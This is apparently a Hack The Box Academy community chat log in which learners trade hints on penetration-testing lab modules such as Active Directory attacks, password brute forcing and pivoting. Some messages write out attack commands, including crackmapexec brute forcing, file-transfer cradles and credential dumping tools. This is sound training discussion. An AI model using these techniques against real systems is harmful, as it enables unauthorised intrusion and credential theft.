yeah the login brute force module could honestly just be scrapped. It has some cool form stuff and nice little intro to cupp, but those could probably be folded into other stuff much better

im going to fall asleep waiting for this ssh account to crack too

Feels like Password attacks all over again

or just reworked to go deeper on the custom wordlist aspect. Have it do more like scraping a site to build a domain specific wordlist and such

Hello i try to Do the RDP and SOCKS Tunneling with SocksOverRDP i'm connected to RDP on htb-student and in th equestion I have to connect to 172.16.6.155 but the ip is not pingable but the ip in the exemple 172.16.5.19 is working

ping does not work over a piviot

hping3 however can if you specify using a common port like tcp 80 instead of icmp

Hey guys, I'm stuck on this question from "Active Directory Enumeration & Attacks" module (Living Off the Land):
What domain user is explicitly listed as a member of the local Administrators group on the target host?
Any hint would be appreciated! 🙂

what have you tried

Many commands 😅

Youre gunna have to explain a little bit of your approach and what aspect youre struggling with. No point if someone just tells you the answer.

you might just be missing something simple but no way to know if you dont give us anything to work with

Get-ADGroup
Get-ADGroup Member
Get-ADUser
net accounts /domain
net group "Local Admins" /domain

Found around 20 members, none of them were accepted as correct answer

are you sure "Local Admins" is a group that even exists?

question asks about local Administrators group

so you should probably be hunting for the Administrators group instead

Thanks for the hint, I'll get back to work 👌

Using "net groups /domain" command

Huh neat

still pretty sure thats not what youre looking for but I can double check in a moment

yeah red herring, thats a domain group, youre looking for the hosts local groups

please I need help with skill assesment 2 in NoSqli

Thanks for this information 👍

I am attemping to do the foorprinting easy lab. I have RSA and RSA.pub. The command I use to ssh in with the given ciel user and the obtained ssh key is ssh -i id_rsa ceil@<ip> correct?

Found it using a command that is not in the course 😅
Was it the way intended?
PS: Thanks for the help! 🙏

its in the course

jk i got it. I swear its always litearlly 2 min after posting for help i figure it out

i think im going to just start by posting for help lMAO

right in the Net cmd subsection it has the command that will get the info

You're right, it also worked with this command

Hi, just wondering if Nessus is already installed on the PWNBOX or if I'm going to have to install it myself?

It says it's installed for the lab test but I can't find it anywhere

I only remember seeing it come up in one module and it was there for you to use

That's what I thought

I'll just use my own VM then

You can't get it for free anymore unless you sign up guh

when I did it is was already installed

Yeah it's no longer working

There's only two licenses which you have to apply for

Doubt

Alright, let me ping you the page for it

I didn't have to sign up for anything

even had the scans pre done for it

Hey all working though some of the easy modules atm, was curious how far into the modules would be enough to do some of the easy boxes?

https://www.tenable.com/products/nessus

I dont care about the tenable page

the module has what you need

Where did you find the program ?

Or should I just start working through easy boxes them with ippsec vids, get a feel for it

Probably a few offensive and a good few general

Its all about when you feel comfortable

did you log into the target machine as per the instructions?

Roger

The IP authentication? I'll give it another try

I can ssh in but I still don't have Nessus

nothing on web interface

https://www.hackthebox.com/blog/It-is-Okay-to-Use-Writeups may help

looks like the web interface is broken, thats the real problem

Is yours not taking you there either?

Web server isnt even running

Copy that

I'll add it to the erratum ^^

Thanks that was exactly what I needed to read

OpenVAS has the same issue

Have you started a box? I'm just about to start one too.

can someone give me a hint ? it's the Skill Assessment of Pivot, Tunelling....

there is any section to hacking cryptocurrency exchanges?

no, see rules

i want to be a cryptohacker

Hello all, in a real life pen test is there any indication that the client is running SNMP? Because when we do a Nmap scan - I don't believe there is anything that gives away the fact the server is running SNMP:

The footprinting SNMP module

Hey everybody, I'm brand new to all this and trying to get going as Christmas is coming up and I've been wanting to hack the box for quite sometime. Can anyone help me figure out if it's better to subscribe on a monthly basis or just buy cubes?

Didn't know about that. Looking at the Academy website it appears you can just buy all you want for the most part. Haven't actually tested it though

Is anyone else experiencing extremely bad connection for the PtT from linux machine? I run 2 commands and the whole machine freezes for about ~4/5 minutes -- then gets back working and after a while the same story again..frozen. ngl its very annoying... is there a way to fix it to make it a more enjoyable experience? Thank you

I completed that module 3-4 days ago and had no issues.

if you are doing this through a vpn and your pwnbox is on then the 2 of them are trying to kick each other off the network the 4-5 minutes thing could be your vpn get kicked but after a bit it get back on a bit after that same thing happened again

Im getting bullied in #general again : /

Got it, thank you.

that place do look like 2b2t chat

Sooo many tryhards lmfao

Anyone know how to find an ObjectAceType of a user?

i've tried all the powershell operators and they aren't working for me

;

just for a sanity check try run Get-DomainDNSZone (nope Get-Module to list all imported module is a better check for this) to see if powerview is imported right

Do you have to have linux to do the exercises?

yep

They provide you with a pwnbox. (Parrot os Linux instance)

You only get a certain amount of pwnbox time if you do the free version. If you pay you get unlimited pwnbox

Thank you!

Anyone Online that's completed the AD Enumeration & Attacks?

Lol im on skills assessment right now

What part? I'm stuck on Assessment 2 Q6

I found that the copy of PowerView that was on the PWNBox already didn't work after transferring to the target. Try cloning it straight from git if haven't already.

hi guys! Stuck on the Skill Assessment of File Upload attacks, can't seem to trigger the xxe. Any hints?

Edit: You can't impersonate a xml code as you would with php code. To exploit XXE you must have the correct extension and content-type otherwise the file doesn't work.

I don't recall using an xxe on that skills assessment

Thought of using xxe to read source code files to discover the upload directory

To be fair it's been a long time since I did it and my notes are bad, but I don't think I used an XXE

XXE can be used if you can upload an SVG image i'm pretty sure

yeah i can already upload a svg image, but just returns the img encoded base64 source

not the source files

sorry for not being of much help lol

hi, i was wondering if there's a quick fix for having a active session that cant be closed

for pwnbox or the spawned machine?

spawned machine, for which ever requires you to download and openvpn

There is a little icon for refreshing the machine

thats fine man, any help is very much appreciated

I'll try to help more, just focused on the AD skills assessment

https://gyazo.com/981330e8cc3c33b564987baca4c94a3c

i cant seem to find any refresh button

its assuming I have no machine up

Actually i got it

Ended being a silly silly detail, as in you can't impersonate a xml code as you would with php code. i.e shell.php.jpg and change the content type and mime type. To exploit XXE you must have the correct extension and content-type otherwise the file doesn't work

You completed the module???

not yet, but managed to disclose the source file which is 90% of the job. just have to read it, upload a shell and complete the module

hope the hint above will help out future students doing this module

welp i'm lost

This should be easy

Kerberoasting super easy to do

did you Import-Module ./PowerView.ps1 ?

Looks like i did with my powershell command

What part are you on?

yep i was recreate your error (this is the enterprise network module not the ad one)

that powerview file is from the pwnbox and that seem to be the issue

it's still imported but just can't use

boy sure makes me glad I just used chisel for the module 😂

if this is the target machine it isn't going to have internet download a new powerview file on to your machine and upload it on to the target machine from there

Looks like I used Mimikatz for that part.

This. The call to GitHub is failing

also for the love of god just use greenshot it's so much easier to censor stuff

I like chisel!

Thanks guys for the help!!!!

flameshot works well too!

oh yeah i did saw tcm mention that and greenshot is also a bit out of day so i may change to flameshot (not sure yet)

@vital adder any chance you can give me a nudge/help on AD2? I seem to be messing up somehting...

nope i haven't done the module

What question

4. I have a good idea what I should be doing from reading the forum help, but I am not getting anywhere with it.... " Use a common method to obtain week creds for another user"

The video in your 'About Me' is funny MrTom

I'll DM

Thanks!

Attacking Enterprise Networks - Lateral Movement. Priv esacalation part is kinda buggy. I respawned my target 3 times but still cannot get admin priv eventhough i was added to administrator group.

Just use alternative path...

Can someone help me with the Path: Basic Toolset, section Network Enumeration with Nmap?
Question is Enumerate all ports and their services. One of the services contains the flag you have to submit as the answer.
I think I found the flag, but the answer is incorrect...

shoot me a dm with the flag you founded i'll verify it for ya

Thank you - that makes sense. How stupid of me!

Have anyone finished the Active Directory module? The powershell console hangs on the ACL Enumeration chapter....not sure if its the syntax

Can someone help me with using "where" in windows 11. Specifically working on the windows CLI module on Finding Files and Directories. I keep getting errors when I try to do where /R C:\Users\ *.txt (or waldo.txt) it keeps telling me that I can't use *.txt or waldo.txt because they aren't parameters. I tried just doing where on a flag.txt.txt that is in the C:\ directory and I still get the same error. Annnd if I copy and paste straight from the exercise I still error. UPDATE!: I'm a dummy and didn't realize I ssh'd into a PowerShell session.

For the last question in Footprinting SNMP I cheated and piped the snmpwalk command through grep looking for HTB to get the flag, because there was so much output from snmpwalk. Was there a better way to do this?

@stuck hull u did not cheat

Hi. having trouble with the AD Assessment I "Submit the contents of the flag.txt file on the Administrator desktop on MS01 ". Someone can help?

WHat section are you doing? I'm having problems getting through DcSync section

Im now on the abuse tactics section, will soon do DCSync

The AD Module is what im doing after this one that im on now

I can't run the secretsdump.py script from my VM. no access to the 172.16 addresses. so not sure how we're suppose to run it....

Cant you run it against the IP of the RDP host?

I can connect to the RDP windows host. but in the DCsync section they are showing both Windows and Linux ways to attack. I want to try the linux way using 'secretsdump.py'

gm everyone

Could I DM someone about Attacking Common Services Skill Assessment (Easy)? ||Already exploited the vulnerability just need help with the next step||

Anyone finish the Introduction to Windows Command Line skills assessment? I'm stuck on the last question. I have the list of failed logons and the associated users but none of them appear to be the answer.

??

That may be so... on both counts but I'm not quite sure how that's relevant here.

i'm stuk in BROKEN authentication, predictable reset token 1&2, can you guys give me guide i can read or video
I've looked for it from many sources, but nothing works

Hi guys, need some help with Windows Privilege Escalation - Pillaging: Log in as Jeff via RDP and find the password for the restic backups. Submit the password as the answer..
I have credentials for jeff, found the backups, but I can't seem to find the password for them. Any hints?

Edit: nevermind I am just blind.

I just finished Attacking Common Services - Hard, it was quite an interesting journey 😉

Gj!!!

I’m stuck on windows priv esc initial enumerations question 1

I know I can run admin cmd so I have elevated privileges but when I type it in that’s not the correct thing

I used whoami/priv

I don’t see anything enabled there

Can someone help pls?

@rustic sage @night pier shoot me a dm if you still need help with that

which module and section are you on?

Module 67/section633

Privilege escalation initial enumeration

Question 1

What non-default privileges does the user have?

pls just give me the name

earlier they said windows priv esc so I presume the Windows Privilege Escalation module

Anyone got a list of all cities names or something, trying to figure out which question is best to test for Guessable answers

already tried literally all colour names I scraped from a website

Windows privilege escalation initial enumeration

Windows privilege escalation initial enumeration

Im not aware of any compiled single list of all cities. Might have to combo a couple different pages from Wikipedia

favourite pizza flavour

come on

hint the color is the right one

I have a full wordlist of just colours

https://www.colorhexa.com/color-names

all from here

wait

I may have not tried something yet

wasn't all lowercase

hint run cmd as normal and use the whoami command after do the same thing but with cmd run as administrator and compare the two

please tell me it's not hex colour

16777215 possibilities

nope it isn't

also hint the right color only have ||1 word|| for example if the right colour is blue then only "blue" would work but in that list if i grep for blue it give me 87 different type of blue

so i would say just guess the color by hand

I did this the user is the same

Also with \priv and the same one is enabled

tried all 1 word colours from that list

I'll try manually now I guess 😅

so 2 cmd one is run as administrator and the other isn't but both whoami /priv give you the same thing?

Only o e privilege name is enabled

Admin has three listed but only one enabled

how can transfert a file from windows RDP to another windows RDP ?

Use net cat

or smb shares

or b64 encode and copy paste

it's for transfer a .exe

Or python web server and power shell wget

windows box might not have python

they don't have python

smb shares will still work, as well as the b64 option

Wow it was a typo

And I found it had to spell it like it is

can also just get a proxy working on the first windows host to connect to the second host and use basically any of your other usual file transfer methods

oh were you doing it without the space?

I didn’t capitalize

cant upload images when youre not verified

I get the gripes about password attacks @.@ Network services is taking far to much of my limited study time...for bruting @>@...so loud so inefficient

got it, now stuck on what ||role to get for session cookie||

Hey guys 🙂

I'm stuck on module "Password Attacks - Network services"

"Find the user for the WinRM service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer."

I've tried bruteforcing using crackmapexec winrm <ip> -u username.list -p password.list , but no success so far and it is taking ages. 😭

I have used the lists in the resources section :/

We're in the same spot

mee too

omg

bruting just takes forever

that is the right command for this so maybe wait a bit more?

my least favorite method to remotely gain access

also i think the pwnbox will be fast for this (it doesn't have to go through a vpn )

yep im using pwnbox currently

hint the ||answer|| is in the ||question||

already tried

with or without space

also tried the ||linux version||

i don't have the brute force time in my note but this will take a while

shoot me a dm with the thing you trieded (too much spoiler)

Thanks for the sanity check 🙂

At least I know i'm on the right path

Lol but once im in, im looking for a privesc and looting the files that way haha @.@ i dont think ill survive 4 times

T_T and this is the first section of this mod phew password attacks is a tribulation lol

@wide oak @fresh reef i forgot htb did make some changed to the wordlist when to module first come out this will take a good while but i just give it a try and it took me like 1-2 min with the same crackmapexec command and the given wordlist

0.0 really?? i'll give it another shot with the list on fresh instances...i promise ive been using the wordlists provided via resources

on the pwnbox i use sudo cme winrm 10.129.48.246 -u username.list -p password.list the cme is just basically the crackmapexec tool but i think they custom installed it or something

ahhh

ok

cme works as you suggested

maybe i borked my initial instance

cme is a powerful tool but in my experience its also been notoriously temperamental

Also worked for me now. Thank you :). It also worked with crackmapexec 🤷‍♀️ this time. Maybe there was something wrong with the previous instance

Guys, is there anything wrong with passwords attack - protected archives task?

I performed zip2john and cracked

But didn’t found the password

And used rockyou of course

I had no issues with that module. Wasn't there a provided wordlist?

try using the provided list or the mutated password list

Ok

only resort to rockyou after the provided ones dont work

Well that worked

Lol thanks, I was thinking the module wants me to use rockyou instead

@carmine kiln theres a dude keep trying to spam nazi stuff and getting their messages deleted by bot but theyre still trying

1 second

It's done

thanks!

Having some troubles specifying a custom wordlist in the auxiliary(scanner/smb/smb_login) module of msf

though the mod accepts "set user_file /home/htb-ac633056/Desktop/wrkspc/username.list"

when ran msf reverts to its rockyou copy

ive also tried to db_disconnect to force the choice...but it now feels like its baked into the script

execute show options before you type run and make sure it's set properly (Also make sure /home/htb-ac633056/Desktop/wrkspc/username.list is the correct path to that file).

─[us-academy-2]─[10.10.14.230]─[htb-ac633056@htb-7llskaiucl]─[~/Desktop/wrkspc]
└──╼ [★]$ ls
hydra.restore  __MACOSX  Password-Attacks  Password-Attacks.zip  password.list  username.list

PASS_FILE   /home/htb-ac633056/Desktop/wrkspc/password.list  no 
USER_FILE  /home/htb-ac633056/Desktop/wrkspc/username.list  no 

But still running rockyou, i know because user "admin" is not present in the custom list...but is still the 1st to be run against

unfortunately

@fresh reef what is the problem

Hey crean 🙂

Im running a dang Metasploit mod (aux/scanner/smb_login) and ive set it to use custom user/pass files

however msf is reverting(?) to rockyou...orrr ignoring the config all together

ive gone over the ruby and all seems well...so probably im just bad lol

Lol im bad

@>@

Resolution : just needed to fix my userlist again....

the medium skill assessment was so much easier than the easy one for Attacking Common Services😅

lol thank the gods

@fresh reef so u are looking for password in short word

Noo, i got it, i knew admin was the first entry of rockyou but i though i removed all entries of other usernames that were not present on the target....I had not

so for about an hour i was like"WHY YU STILL ROCKYOU"....i just didnt notice that the top of my vim session was cutoff @>@

like i said... im bad lol

apparently

Ok

Thankyou for answering though @.@

@rustic sage Thankyou aswell

Anyone online for question?

easier to just ask your question and see who replies

Well do I still need to use the files htb gave at password attacks at the skill assessment?

Looking for a nudge on AD Enumeration & Attacks - Skills Assessment Part II
Question 6 : Locate a configuration file containing an MSSQL connection string. What is the password for the user listed in this file?

I saw some earlier hints on using crackmapexec on the ||department share|| found a .config file but can't seem to smbclient to the share. Have the path to the config file but can't see it's contents

yes

Well looks like I’m gonna run some hydra on that ssh and ftp to examine

iirc rockyou was used on some sections still though, so keep that in mind if the regular list and the mutated list dont work

Ok thanks

Is anyone available for Attacking Common Services Skill Assessment (Hard)? Pretty sure I'm on one of the last steps (if not the last step)

Can someone dm for Skill Assessment of Pivoting, Tunnelling and Port Forwarding ?

sorry for the delay, but thank you!!!!!!!

I need a staff because i make a mistake on subscription plan

Command injection command filters I've attempted everything on our list and I'm not udnerstanding what I could possibly be missing for "identifying Filters"

Question it asks ||Try all other injection operators to see if any of them is not blacklisted. Which of (new-line, &, |) is not blacklisted by the web application? ||

So this makes it seem like I can try these 3 things and test which isnt blacklisted?

am I going crazy cause I'm missing something

keep in mind there are other active blacklists as well, so you may be attempting a blacklisted command

try JUST those in your injection point, dont try to inject a cmd right away

thats exactly what I did

I had several things "get through it" but none of those entered were the correct answer

(happy to pm or hop on a call to understand a little better)

at work atm

Okay so Ill post some screenshots and general thoughts/ what i'm thinking if thats fine?

not sure if thats too much for this channel

Ended up getting it but like had to use asci characters

and CTRL+U wouldnt do it correctly?

url encoding some of em mightve messed it up

idk I used ffuf cause I missed the three suggested ones so I was testing all of em

yea eventaully %92n worked but if i took \n and encoded It doesnt work

so want to make sure thats not somethign that can happen a bunch when working web app stuff

Hi everyone, I'm having trouble doing the exercise in the module below:
https://academy.hackthebox.com/module/115/section/1120

I tried Pwnbox and my VM, and I haven't been successful. In my VM, I pretty much got to the point where I intercepted the request with Burp, but when I change the content type and forward it nothing happens. I don't get any message saying "you've added new vendor" and when I go to the url listed "../images/vendor/connect.php", I get a 404 message. I'm I missing anything?

Introduction to Windows Command Line findstr for waldo.txt, out of memory or cannot open file waldo.txt

need help

got it nm

look at recursive instructions if stuck

Would like a sanity check for Active DIrectory enumeration and attacks Skills assessment 1

On Active Directory Enumeration and attacks skills assessment 1. I've tried about 8 different wordlists to crack the hash. Wondering what I should change in my approach.

Should I try different hashcat attacks like mask/hybrid/combination ??

rockyou is perfectly fine for it

you may not have actually grabbed a good hash

Haven't had success with rockyou so probably something I did wrong

its a very simple password

Ok. That will be helpful.

like on the pwnbox hashcat shouldnt take any more than like 20seconds after preprocessing to crack simple

Lol. When it was because when i used ' Get-DomainUser' I specified the wrong user. So powerview gave me the wrong hash

Never overlook simple mistakes haha

I'm guessing for this next question I will need to do some pivoting

🙂

note to self. dont do the modules out of order

all the pivoting is really minor. You wont run into any double hop problems for example

the first module in the CPTS path says don’t do them out of order😂

they’re in that order for a reason

everything builds on top of the previous lessons

So I am assuming to do this I need to set up a pivot and use the credentials I got with kerberoasting. Running shit in a web shell is frustrating.

Should I just do the Pivoting, Port forwarding, Tunneling module and come back to this??? I literally have no idea how to pivot, so Im stuck lol.

Oops 😂

You doin the modules out of order also???

I've just been jumping around

I wouldn’t recommend it

Saaaaaaame

Haven't had any problems yet tho

Hi, i'm on the password-attacks easy lab and crackmap seems to be giving me a problem. It spits out
(Response:'NoneType' object has no attribute 'sendall') after every attempt except the first attempt, which spits out
login incorrect.
Is this a crackmap error or am I just using the wrong wordlists?

jump into pivoting, skip to chisel section, maybe review proxychains if chisel section doesnt cover it. Google how to cross compile for golang and add it to your chisel notes, jump back to this one.

Should be like an hour or two tops to learn enough about chisel and proxychains to do what you need to do.

Thanks man.

anyway, i am an idiot

quick question. for all of you taking notes etc. do you keep windows (local) and active directory apart as different things or all in one place (in lack of better words or explanation)

sometimes certain tools will act funny with given host and service try different tool if its not working. Try to use hydra on ftp service and crank up the treads with -t <number> to speed things up

notes will be just personal preference. Alot ways and apps you can take notes on.

it really does come down to personal preference and what you think will be most beneficial🤷🏼‍♂️ I personally separate my notes by module

hi guys, can anyone help me with the module ACTIVE DIRECTORY ENUMERATION & ATTACKS section Living Off the Land?, the third question is: "Utilizing techniques learned in this section, find the flag hidden in the description field of a disabled account with administrative privileges. Submit the flag as the answer"; I tried with (userAccountControl:1.2.840.113556.1.4.803:=2) but it not shows anything flag. Please .......EDIT (SOLVED): Well, for anyone that stuck in this question; a hint is use the command line mentioned above with the attribute * "described😉"* in the same question, thanks Mentally6boy

i shoot you a dm.

Is there a module for coding other than Intro to Bash Scripting? I’m going through the CPTS path but getting to the point where I’d love to know what the scripts etc. are doing rather than just copying and pasting them and hoping for the best

If not then can anyone recommend a good online resource to learn coding?

there is Python and Assembly. not sure of any others.

Hello everyone
I started recently learning in hack the box academy until i reached this section. The port listening does not respond. I tried different commands for reverse shell, different ports, but nothing is working. I would be thankful if someone has an idea of how to solve it.
https://academy.hackthebox.com/module/77/section/852

I’m not at my computer at the moment, so I won’t be much help. Nibbles is a retired box on the HTB Platform, meaning there are ton of writeups online (most likely an ippsec video) for this box. Try looking at a few 🙂

I managed to do it using metasploit, thank you.

Hi!

┌──(christrc㉿kaliasshole)-[~/…/challs/htb/htb_academy/passwordsAttacks]
└─$ sshpass -p Password2 ssh david@10.129.20.211 -p 2222
Permission denied, please try again.

SSH to 10.129.20.211 with user "david@inlanefreight.htb" and password "Password2"

password won't work

me too, there is more fun for rdp :)))

Carefully read again the username that you need to connect with

It's a rather simple process so long as you downloaded the resources zip.

Reread the instructions for crackmapexec and hydra. Remember these applications can use more than one protocol.

hello.Can anyone help me?

$ sudo openvpn academy-regular.ovpn
Options error: Unrecognized option or missing or extra parameter(s) in academy-regular.ovpn:12: data-ciphers-fallback (2.4.7)
Use --help for more information.

I'm tryng to do the Service Scanning exercises

1. Did you download the configuration file?
2. Are you in the same directory as the configuration file?
3. If you’re not in the same directory you need to specify the path to the file.

thanks @rustic sage .So 1) I really don't know because last time i was fall asleep and i don't remember if I configured all. How can I see if it's all setting up? 2) yes

you don’t need to make any changes to the file. Just download it from HTB Academy and execute the openvpn command. Maybe it’s worth downloading a new one just in case

Also make sure your Kali VM in properly connecting to the internet as well

Is anyone elses boxes being a bit slow today?

I'm stuck also on AD Skills MSO1 accesss. I am doing pivoting module but is mainly from linux to linux (ssh mainly) and pivoting to windows. need to check again. let me know if you pass it 🙏

Hey guys Im trying the Bug Bounty thing through hack the box and I am at the module where we need to use the Cookies and Json to find the flag. However I can use the cookie to login but when doing the search it comes up in saying A valid authentication cookie is required. To verify the cooking I am using this command "curl -H 'Cookie: PHPSESSID=fcvo8sacqr1q4668ofaet34aj9' http://161.35.36.93:30263" Which logs in just fine and when I use this command" curl -X POST -d '{"search":"flag"}'-b 'PHPSESSID=fcvo8sacqr1q4668ofaet34aj9' -H 'Content-Type: application/json' http://161.35.36.93:30263/search.php' it says the cookie is not valid. Are these boxes on HTB broken?

got it, i was just focusing on running a command and not check anything else, dumm of me..

Could I DM someone about Attacking Common Services (Hard) Skill Assessment?

Hello guys, i stuck on Attacking DNS for a while, and dont know what im doing wrong.

What i did:

echo “10.129.203.6” > my--resolvers.txt
./subbrute.py inlanefreight.htb -s ./names.txt -r ./my--resolvers.txt

This doesnt work. whats wrong ?

not sure what module your doing, but dont assume its always called "flag"

True, but to go further the cookie as to valid I believe right?

Is the cookie changing after a certain amount of time (changing after each request)? I also have done that module, but it's something to look out for.

No I can use the previous command in the comment and it works still.

which module is this?

just edit resolvers.txt in the directory where you downloaded subbrute

POST in Web Request.

Hi, I'm trying to do the module "STACK-BASED BUFFER OVERFLOWS ON WINDOWS X86", section "Jumping to Shellcode" and I'm stuck on the question, I created the .wav file but for some reason when I open the 'Free CD to MP3' program as admin I can't find the file even though it's clearly exists in the desktop. Can somebody help me?

I haven't done this module, but usually when you try to upload something to a website it will only show certain files by default. Within your file manger is there a list on the bottom right somewhere that you can specify "All Files"?

I tried to change the default file extentions to all but it still haven't show the file

Could you post a screenshot of the file existing on your Desktop and the File Manager when you go to Upload

Verify

I sent you in a dm

hello! I think i'm connectected with my username.openvpn file because it's load a script that end with Initialization Sequence Completed but it doesn't end..Like i cannot had a new line to write .

but other hand i download the vpn file for the exercise and give me the same error sudo openvpn academy-regular.ovpn
Options error: Unrecognized option or missing or extra parameter(s) in academy-regular.ovpn:12: data-ciphers-fallback (2.4.7)

thanks. i re-arranged the windows part in my notes mostly on the post exploitation part. attacking sam and lsass is more on local machines and not in AD or am i wrong?

Still workin on it. Will let you know if I get any progress

Madfox told me to use chisel

smbclient -U bob \\10.129.63.85\users
do_connect: Connection to failed (Error NT_STATUS_NOT_FOUND)

Why I get this error?

Good evening! Who can help?
Introduction to NoSQL injection
Skill Assessment II.

Does that user exists? Does that Share exists? Correct IP?

Yes. Is a exercises of getting started. AND i use the terminal online on the site

The section is when they teach you to use nmap, smbclient

Anyone finish the Introduction to Windows Command Line skills assessment? I'm stuck on the last question. I have the list of failed logons and the associated users but none of them appear to be the answer.

also stuck on the last question of the pillaging page of the windows priv esc module I have the password but somehow I can't restore the backups because the password only works when listing the backups

Modules and Paths I hope HTB academy expands with

WiFi Pentesting
USB Forensics

ReadTeam Path
BlueTeam Path

😭🙏

There is a way to extract info from database, also you might have to Fuzz variable names in the query.

i think there is 1 section on wifi stuff in the hashcat module

Where you able to pull the module up?

hint you need to run that on the ||domain controller||

Ill try again.

i don't have the note on which file for some reason but the file that you found the cred in should have a command run that command with the cred and you should get a list of "backups" you can work with and hint ||restore them all||

Did you use the same cookies you got with the cmd prior?

try \\\\(IP)\\users

@vital adder thanks

messaged you

Ohhh

Ohh well

For this question in the AD Skills assessment 1. I’ve cross compiled and set up chisel on the compromised web server. Might need on nudge on what to do next.

This module is a beast

My boi @gloomy tangle is stuck on this too

https://tenor.com/view/daladada-cat-crying-cry-scream-gif-24748831

Hi, did anyone finish stack-based overflow windows x86? I'm stuck on the remote exploitation. I made exploit and did everything as they asked but for some reason I still don't get the reverse shell connection.

I did

I already know the answer for this one, but I don't know what format I'm supposed to put the answer in and it's really frustrating

Please do not post the answers to questions.

my apologies

Which module/chapter Aliza?

Intro to Network Traffic Analysis: Interrogating Network Traffic With Capture and Display Filters

I know the answer already but i can't figure out the format the question wants

<low number> <high number>

Just put a space between them

i.e.
1 65535

ty

np

Had to go and check in the module, as I hadn't recorded my answers for that module 🙂

Hi all, sorry for the question.
if i know the name of a service how do i do a lookup of all the ports it is running on with nmap ?

the fact is that I'm doing a search with -p- but my connection is slow and it takes more than 3 hours and the virtual lab keeps my target active for only 1 hour

please somebody help me whit mango file assesment 2 . https://academy.hackthebox.com/module/171/section/1692

Did you get through this? You can DM me

Sent a dm

It really is a beast. Very satisfying when you finish though.

I haven't had any luck with chisel. 😢

rough

skill issue

😢

r u using pwnbox or your own vm ?

.

Hey everyone. If anyone has been through the Active Directory enumeration & attacks “Privileged access” . I would appreciate some help on question 3. I’m not able to authenticate to the Academy-ea-bd01 host with mssqlclient.py. I was wondering if I could pm someone to see if I’m inputting the command correctly.

I'm a fresh noob, I cannot connect to the machines VPN and tried deleting the file and now I can't even download it again..any ideas why?

Connecting to the vpn is pretty easy. Just type in “ sudo openvpn xxxxx.ovpn “

There shouldn’t really be anything stopping you from redownloading it

Also https://help.hackthebox.com/en/articles/5185536-connection-troubleshooting

Looking for a tip. I'm on the final assessment for AD Enumeration and Attacks. I've got access to MS01, fairly certain I know the user ||tpetty|| - but for the life of me I can't get any of my tools transferred over. I'm using chisel for my pivot and have complete confidence it's working fine. I've tried certutil various powershell download cradles, even just visiting a basic web page that I'm hosting. A connection isn't even attempted. I'm using the IP address on my tun0 interface (using OVPN). What am I missing?

I have SYSTEM on MS01 as well.

Try loading python web server on host(sudo python2 -m SimpleHTTPServer 81), on target run powershell: wget yourip:81/filename -O filename

Let me know if that helps 🙂

You should see the file being requested in python server output

Look up common/standard ports for the service and then check only those ports with -p21,22 or whatever ports may be

You can also try doing it via smb share

I'm doing Footprinting-dns. I am stuck on this question. Identify if its possible to do a zone transfer and submit txt record as proof. However after enumerating all the domains for subdomains and trying the following command for each of them I still can't find the flag. Dig any inlanefreight.htb @10.10.10.10(not the real ip)

Btw im looking for someone who i can bounce ideas of off and go to if im struggling with something. If any ones interested dm me I can send some crypto for your help

Did you need to dig through a ton of text to find it in the output? It's currently driving me insane pls help lol

Awesome stuff.

I don't know but when I see folks from Academy having HTB ranks such as Script Kiddie, Noobs, I smile.

By the way, how did you get the role Academy User

Hi, I'm trying to do AD - LLMNR poisoning from windows, unfortunately when I try to rdp to the provided machine i get a credentials error with rdesktop, a black screen with xfreerdp. creds work with evil-winrm tho

has anybody encoutered and solved this problem?

No, just take into account my hidden advice and you'll find it
I've used one of the commands shown in the section

sup guys is there any hints for medium in nmap module? i just keep trying but nothing appeared yet

I'm having some issues routing from box, as soon i run the pingsweep session dies, is there a possible fix anyone knows of?

try asking that in #710108839063846964 if you can't access that channel use ++verify at #bot-commands

hint ||protocol||

hint you have to use subdomain brute forcing for this and they did give you a one liner for that

dont get it, you mean 80 port?

hint nope

Hi guys, has anyone tried the deserialization module?

I'm stuck with the 2 flag, in skills assesment

no one?

Sorry bro I didn't try this module yet

I just used xfreerdp?

I need little help related to Network traffic analysis module.

Q:Given the capture /tmp/capture.pcap what tcpdump command will enable you to read from capture and show output in hex and ASCII ?

||sudo tcpdump -rX /tmp/capture.pcap||

Is not working

Any idea why python2 would work, but python3 -m http.server 80 doesn't? I'll test wget via powershell later today. Also setup my SMB share, met with the same result. Appreciate the tips.

im sooo stuck on hackthebox academy Footprinting

the last one

What is the FQDN of the host where the last octet ends with "x.x.x.203"?

And it seems my connection keeps crashing

pfff

Which chapter is that?

If its DNS chapter, I used dnsrecon

You need to find all zones

I got it

I just used the wrong wordlist

Can anyone help me with this

Does anyone know how you link your account?

Also anyone have any advice for which modules and machine labs I should do to attack The Pro Lab Dante I'm a bit stuck

Hi dm @little whale with ++verify

I'm doing the sqlmap essentials module, and I'm.. like... 99.9% sure I have the flag, but it doesn't seem to accept it. Anyone able to sanity check for me?

ya which module? or you good

I think I'm good. It was the assessment.

Returning for a continued sanity check. Summarized version: I have SYSTEM on MS01 on the AD Enumeration/Attacks assessment. Using chisel between my Kali and MS01. I can transfer files fine between Kali and the jump box (10.129.94.103), but cannot transfer files between Kali/MS01. Here are some screenshots for reference. Any tips strongly appreciated. Tried SMB, Powershell, Python webservers, etc.

Successful tranx from jump box to Kali.

Failure trying to get anything from MS01

@severe monolith is it possible to ping the ip address

From MS01, no.

@severe monolith if u cannot ping the kali ip address from mso1 it is impossible to tranfer the file but using evil-winrm it is possible to download the file into the machine

Any good links to sharpen up my evil-winrm? Mobile atm. Thanks for the suggestion as well.

Im unsure where mfcvenom came from. Im new here can u help

@severe monolith use menu options u will see the that evil-winrm has download option which u can use to download the files into the machine

@rotund swallow is it msfvenom

yeah sorry I am not good quite penetration softwares...

I lack skills

dm me

@rotund swallow https://www.offensive-security.com/metasploit-unleashed/Msfvenom/

ah metasploit this exploits patches and more?

@rotund swallow just helps in creating payloads

yeah phishing emails...

ok

Thanks. I haven't used it in a while. Tunnel visioned at the moment, so taking a small break.

@rotund swallow no

huh..

@rotund swallow phishing and creating payloads are different things

ok.. i am weak on the network/penetration

I need more exposure

Hello guys!! I have a problem to access in Kali linux you can help me please??

they send me a message :This virtual machine is configured to run with 4 CPUs, but the host has only 2 CPUs. This virtual machine cannot be powered on.

hey yall , im having a problem with ffuf module , so i have my host translated to academya.htb and using ffuf to enumerate subdomains giving me results as the module said its all 200 and we need to filter i tried to filter through size but nothing came out ... its frustrating

